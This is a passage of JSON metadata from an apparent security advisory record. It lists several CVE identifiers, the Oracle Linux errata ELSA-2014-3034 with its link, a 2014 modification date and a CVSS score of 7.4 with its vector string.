"CVE-2014-0049", "CVE-2013-6885", "CVE-2014-0077", "CVE-2013-4587"], "modified": "2014-05-19T00:00:00", "id": "ELSA-2014-3034", "href": "http://linux.oracle.com/errata/ELSA-2014-3034.html", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}]}